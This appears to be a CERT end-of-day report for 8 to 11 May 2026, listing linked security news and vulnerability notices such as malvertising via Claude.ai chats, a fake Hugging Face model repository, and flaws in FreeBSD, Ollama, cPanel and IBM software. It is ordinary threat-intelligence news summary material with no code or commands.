End-of-Day report
Timeframe: Freitag 08-05-2026 18:00 - Montag 11-05-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
News
Hackers abuse Google ads, Claude.ai chats to push Mac malware
Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac.
https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/
Messenger: So will Signal Phishing-Angriffe erschweren
Nachdem die Messenger-App Signal Ziel einer Phishing-Attacke unter anderem auf Politiker geworden ist, sollen solche Angriffe erschwert werden.
https://www.golem.de/news/messenger-so-will-signal-phishing-angriffe-erschweren-2605-208511.html
Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads
A malicious Hugging Face repository managed to take a spot in the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users.
https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html
Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged
Cybercrooks ruin engineers weekends with Saturday attack. Checkmarx-s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend.
https://www.theregister.com/devops/2026/05/11/checkmarx-tackles-another-teampcp-intrusion-as-jenkins-plugin-sabotaged/5237780
Yarbo responds to robot flaws that could mow down their owners
A researcher found a host of vulnerabilities in Yarbo garden robots that could expose Wi-Fi passwords, hijack cameras, and run over their owners on command.
https://www.malwarebytes.com/blog/news/2026/05/yarbo-responds-to-robot-flaws-that-could-mow-down-their-owners
E-Mail zur Erneuerung der ID Austria App ist fake
Aktuell ist eine betrügerische E-Mail im Umlauf, die Nutzer:innen zu einem angeblich notwendigen Update der ID-Austria-App auffordert. Das Ziel: Zugang zu privaten Daten und Accounts zu erlangen.
https://www.watchlist-internet.at/news/erneuerung-der-id-austria-app-fake/
Flash Alert: EtherRat and TukTuk C2 End in The Gentleman Ransomware
In April, we observed an intrusion linked to the Atos-reported campaign where an EtherRAT was installed via a malicious MSI masquerading as a Sysinternals tool. Later in the intrusion, we observed the deployment of a new malware framework named TukTuk, first reported by Evangelos G, which, according to their analysis, is AI-generated.
https://thedfirreport.com/2026/05/11/flash-alert-etherrat-and-tuktuk-c2-end-in-the-gentleman-ransomware/
Vulnerability Garden: A growing list of named vulnerabilities, attack techniques and exploits
A growing list of 966 named vulnerabilities, attack techniques and exploits.
https://vulnerability.garden/
the 90 day disclosure policy is dead
The 90 day responsible disclosure window was built for a world where bug finders were rare and exploit development was slow. That world is gone. LLMs have compressed both timelines to near-zero. I have seen it first hand, and so has everyone else paying attention.
https://blog.himanshuanand.com/2026/05/the-90-day-disclosure-policy-is-dead/
Hunting ClickFix Win + X Variants
It has been just over a year since my post on ClickFix, where I explored the technique in depth. Since then, defenders have adopted countermeasures that detect ClickFix execution through the Windows Run prompt shortcut (Win + R), or have disabled that vector entirely through the Windows registry. This post focuses on variants that leverage the Windows Power User Menu (Win + X) and user-driven Terminal launches to paste and execute commands.
https://detect.fyi/hunting-clickfix-win-x-variants-ff06e4c62bd9
Vulnerabilities
Per DHCP-Antwort zum Root: KI findet 21 Jahre alte Schadcode-Lücke in FreeBSD
Auf unzähligen FreeBSD-basierten Systemen lässt sich über einen bösartigen DHCP-Server im Netzwerk Schadcode einschleusen und als Root ausführen.
https://www.golem.de/news/per-dhcp-antwort-zum-root-ki-findet-21-jahre-alte-schadcode-luecke-in-freebsd-2605-208535.html
Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory Leak
Cybersecurity researchers have disclosed a critical security vulnerability in Ollama that, if successfully exploited, could allow a remote, unauthenticated attacker to leak its entire process memory. The out-of-bounds read flaw, which likely impacts over 300,000 servers globally, is tracked as CVE-2026-7482 (CVSS score: 9.1). It has been codenamed Bleeding Llama by Cyera.
https://thehackernews.com/2026/05/ollama-out-of-bounds-read-vulnerability.html
JDownloader verteilte Malware-Downloads
Die Webseite des recht populären Downloader-Tools JDownloader wurde kompromittiert. Sie hat dadurch falsche Installationspakete ausgeliefert, die mit Malware verseucht sind. Inzwischen haben die Betreiber die Webseite bereinigt. Auch bei den Daemon Tools gab es solch einen Vorfall; inzwischen haben auch dort die Inhaber reagiert und stellen nun saubere Installer bereit.
https://www.heise.de/news/JDownloader-verteilte-Malware-Downloads-11288832.html
Sicherheitspatch: Abermals Sicherheitslücken in cPanel und WHM geschlossen
Angreifer können cPanel und WebHost Manager unter anderem mit Schadcode attackieren. Sicherheitspatches sind verfügbar.
https://www.heise.de/news/Sicherheitspatch-Abermals-Sicherheitsluecken-in-cPanel-und-WHM-geschlossen-11288962.html
Schadcode-Lücke bedroht IBM App Connect Enterprise und IBM Integration Bus
Angreifer können IBM App Connect Enterprise und IBM Integration Bus for z/OS attackieren. Updates lösen das Sicherheitsproblem.
https://heise.de/-11289112
LWN Security updates for Monday
https://lwn.net/Articles/1072301/